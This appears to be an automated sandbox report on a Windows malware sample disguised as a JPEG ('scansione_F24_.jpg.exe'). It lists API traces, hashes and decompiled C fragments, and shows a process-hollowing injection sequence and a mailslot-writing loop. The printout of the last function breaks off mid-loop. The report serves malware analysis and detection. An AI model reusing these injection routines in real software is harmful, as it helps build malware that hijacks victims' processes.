    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 9
  • API ID: HeapFreeStrStrI
  • String ID: pnls
  • API String ID: 4137399961-141991303
  • Opcode ID: 4aa7b909af106ac1487055971ad23c5d9ff314578936fa2f1abc21ea428e854d
  • Instruction ID: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
  • Opcode Fuzzy Hash: E6D095824D6F9B47C9517014971DE702580FF430D3D9B726405C1434515F00301F1D1D
  • Instruction Fuzzy Hash: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
APIs
    • Part of subcall function 002E47D3: memcpy.NTDLL(00000004,?,?,?,00000000), ref: 002E48C3
  • HeapFree.KERNEL32(00000000,?,?), ref: 002E14BE
    • Part of subcall function 002E3D12: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C), ref: 002E3D27
    • Part of subcall function 002E3D12: GetSystemDefaultUILanguage.KERNEL32(?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C,?,?,?,002E1800,00000000,?,002E7494), ref: 002E3D31
  • StrStrIA.SHLWAPI(00000000,002E7494), ref: 002E14A4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:E5C7B986B6FD3733504DB3FD6D6FAADA
Total matches:37
Initial sample Analysis ID:68428
Initial sample SHA 256:9D2D7459EDA5BC0063FC6EF47DE20AFBFA28AA6981F0EE63D90AE3E10EC4F835
Initial sample name:scansione_F24_.jpg.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
